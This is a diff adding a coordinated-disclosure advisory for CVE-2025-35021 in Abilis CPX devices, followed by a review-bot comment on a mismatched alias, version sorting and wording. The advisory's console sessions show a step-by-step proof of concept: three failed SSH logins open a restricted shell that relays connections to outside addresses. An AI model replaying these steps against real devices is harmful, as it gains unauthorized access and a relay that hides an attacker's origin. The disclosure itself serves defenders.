| 1 | +--- |
| 2 | +title: CVE-2025-35021 |
| 3 | +aliases: |
| 4 | + - /cves/CVE-2025-35027.html |
| 5 | + - /gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100 |
| 6 | +publishDate: 2025-11-03T18:06:00-06:00 |
| 7 | + |
| 8 | +--- |
| 9 | + |
| 10 | +## CVE-2025-35021: Abilis CPX Fallback Shell Connection Relay |
| 11 | + |
| 12 | +[AHA!] has discovered an issue with Abilis CPX devices, and is publishing this disclosure in accordance with runZero's standard [disclosure policy] today, November 3, 2025. [CVE-2025-35021] has been assigned to this issue. Any questions about this disclosure should be directed to cve@takeonme.org. |
| 13 | + |
| 14 | +The [GCVE](https://gcve.eu/about/) identifier for this issue is <span style="white-space: nowrap;">[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100]</span> |
| 15 | + |
| 16 | +# Executive Summary |
| 17 | + |
| 18 | +By failing to authenticate three times to an unconfigured Abilis CPX device via SSH, an attacker can login to a restricted shell on the fourth attempt, and from there, relay connections. This issue is an instance of [CWE-1188](https://cwe.mitre.org/data/definitions/1188.html), 'Initialization of a Resource with an Insecure Default,' and is estimated to have a CVSS 3.1 score of [6.5](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N). The relevant [SSVC] vectors for this vulnerability are *Exploitation: PoC* and *Technical Impact: Partial*. |
| 19 | + |
| 20 | +# Technical Details |
| 21 | + |
| 22 | +A number of Abilis CPX devices drop to a fallback shell after three unsuccessful login attempts, if the device is not already configured with an SSH password. This shell allows outbound sessions from the device. |
| 23 | + |
| 24 | +In the example console session below, three known-incorrect logins (`bad`) are offered to an affected device before being dropped to the `SSHS` prompt. |
| 25 | + |
| 26 | +``` |
| 27 | +$ ssh root@[TARGET] |
| 28 | +root@TARGET's password: |
| 29 | +
|
| 30 | +COM |
| 31 | +
|
| 32 | +Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10 - Abilis ID NNNNNNN |
| 33 | +Tuesday 19/08/2025 06:07:48 (UTC+02:00) - UpTime 2 days 11:20:42 |
| 34 | +Login: bad |
| 35 | +
|
| 36 | +PERMISSION DENIED |
| 37 | +
|
| 38 | +Login: bad |
| 39 | +
|
| 40 | +PERMISSION DENIED |
| 41 | +
|
| 42 | +Login: bad |
| 43 | +
|
| 44 | +PERMISSION DENIED |
| 45 | +
|
| 46 | +
|
| 47 | +CLR F0 AE |
| 48 | +
|
| 49 | +[192.168.11.002] SSHS> |
| 50 | +``` |
| 51 | + |
| 52 | +At this point, we are in the `SSHS` shell. This is a restricted shell, though it can be used as a relay to other systems. The below example uses the `SSHC` shell: |
| 53 | + |
| 54 | +``` |
| 55 | +[192.168.11.002]help |
| 56 | +CP Open connection to local CP resource |
| 57 | +SSH Open connection to local SSH client |
| 58 | +TELNET Open connection to local TELNET client |
| 59 | +<CD>-<UD> Open X25 call with CD and UD |
| 60 | +CLR Close connection |
| 61 | +CLOSE Close SSH Session |
| 62 | +EXIT Close SSH Session |
| 63 | +HELP Show current help |
| 64 | +[192.168.11.002] SSHS>SSH |
| 65 | +[192.168.11.002] SSHC> |
| 66 | +[192.168.11.002] SSHC>OPEN 8.8.8.8:53 |
| 67 | +Trying 8.8.8.8:53 ... Open |
| 68 | +
|
| 69 | +Version identification fault |
| 70 | +``` |
| 71 | + |
| 72 | +Similar to the `SSHC` shell, the `TELNETC` shell offers another path to connection relaying, and does not require the service to handshake a particular way: |
| 73 | +``` |
| 74 | +[192.168.11.002] SSHS>TELNET |
| 75 | +[192.168.11.002] TELNETC> |
| 76 | +[192.168.11.002]TELNETC>open 1.2.3.4:5678 |
| 77 | +Trying 1.2.3.4:5678 ... Open |
| 78 | +``` |
| 79 | + |
| 80 | +## Affected Products |
| 81 | + |
| 82 | +Affected versions of CPX devices include: |
| 83 | + |
| 84 | +* Abilis CPX - Ver. 7.4.10/STD - Build 3608.48 |
| 85 | +* Abilis CPX - Ver. 8.10.2/STD - Build 4703.15 - Branch 8.10 |
| 86 | +* Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10 |
| 87 | +* Abilis CPX - Ver. 8.11.0/STD - Build 4715.15 - Branch 8.11 |
| 88 | +* Abilis CPX - Ver. 8.11.11/STD - Build 4715.52 - Branch 8.11 |
| 89 | +* Abilis CPX - Ver. 8.11.14/STD - Build 4715.57 - Branch 8.11 |
| 90 | +* Abilis CPX - Ver. 8.11.2/STD - Build 4715.19 - Branch 8.11 |
| 91 | +* Abilis CPX - Ver. 8.11.5/STD - Build 4715.28 - Branch 8.11 |
| 92 | +* Abilis CPX - Ver. 9.0.0/STD - Build 4957.3 - Branch 9.0 |
| 93 | + |
| 94 | +Across these devices, affected SSH banners include: |
| 95 | + |
| 96 | +* SSH-1.99-CPX SSH Server |
| 97 | +* SSH-2.0-CPX SSH Server |
| 98 | + |
| 99 | +## Mitigation |
| 100 | + |
| 101 | +According to the vendor, setting a password to the SSH service will effectively remedy this behavior. Furthermore, firmware version 9.0.7 has been released so users can no longer accidentally expose an effectively no-authentication relay service. |
| 102 | + |
| 103 | +# Attacker Value |
| 104 | + |
| 105 | +By providing a pivot point to relay connections, attackers can use affected CPX devices to effectively shield their true originating IP address when launching attacks against other targets. |
| 106 | + |
| 107 | +# Credit |
| 108 | + |
| 109 | +This issue was discovered by [HD Moore](https://www.runzero.com/authors/hd-moore) and disclosure was coordinated by [Tod Beardsley](https://www.runzero.com/authors/tod-beardsley/) through the [AHA!] CNA. |
| 110 | + |
| 111 | +# Timeline |
| 112 | + |
| 113 | +* 2025-08-09 (Sat): Briefly demoed at [Def Con 33] in the presentation, [Shaking Out Shells with SSHamble] |
| 114 | +* 2025-08-19 (Tue): Initial contact to the vendor at info@antek.it |
| 115 | +* 2025-08-20 (Wed): Provided technical details to the vendor |
| 116 | +* 2025-08-22 (Fri): Vendor acknowledged the vulnerability as a configuration issue |
| 117 | +* 2025-10-21 (Tue): Vendor released [Abilis firmware update 9.0.7](https://support.abilis.net/relnotes/cpx2k/R9.0.html#R9.0.7) |
| 118 | +* 2025-10-30 (Thu): Findings presented at AHA! Meeting 0x00e5 and [CVE-2025-35021] reserved |
| 119 | +* 2025-11-03 (Mon): This public disclosure |
| 120 | + |
| 121 | +---- |
| 122 | + |
| 123 | +[AHA!]: https://takeonme.org |
| 124 | +[disclosure policy]: https://takeonme.org/cve.html |
| 125 | +[CVE-2025-35021]: https://www.cve.org/CVERecord?id=CVE-2025-35021 |
| 126 | +[SSVC]: https://www.cisa.gov/stakeholder-specific-vulnerability-categorization-ssvc |
| 127 | +[Def Con 33]: https://www.youtube.com/watch?v=XHoH4ic8fX8 |
| 128 | +[Shaking Out Shells with SSHamble]: https://www.runzero.com/def-con-33-hd-moore/ |
| 129 | +[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100 |
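Review bot: the front matter's `aliases` entry on line 4, `/cves/CVE-2025-35027.html`, does not match the CVE this page documents (`CVE-2025-35021`, lines 2, 10 and 12); unless a redirect from the -35027 URL is deliberate, this looks like a copy-paste slip and should read `/cves/CVE-2025-35021.html`, otherwise the site will serve this advisory under another CVE's path. Two smaller points in the same file: the Affected Products list (lines 84-92) is sorted as text rather than by version (8.11.11 and 8.11.14 precede 8.11.2 and 8.11.5), and it stops at 9.0.0 while the fix is 9.0.7, so it is worth stating whether 9.0.1 through 9.0.6 are affected, or phrasing the range as "prior to 9.0.7" if the vendor confirmed that. In Mitigation (line 101), "setting a password to the SSH service" should be "setting a password for the SSH service", and the sentence on 9.0.7 would be more useful if it said what the release changes (for example whether the fallback shell is removed or the device now refuses SSH until a password is set), with the release-notes link from line 117 repeated there rather than only in the Timeline.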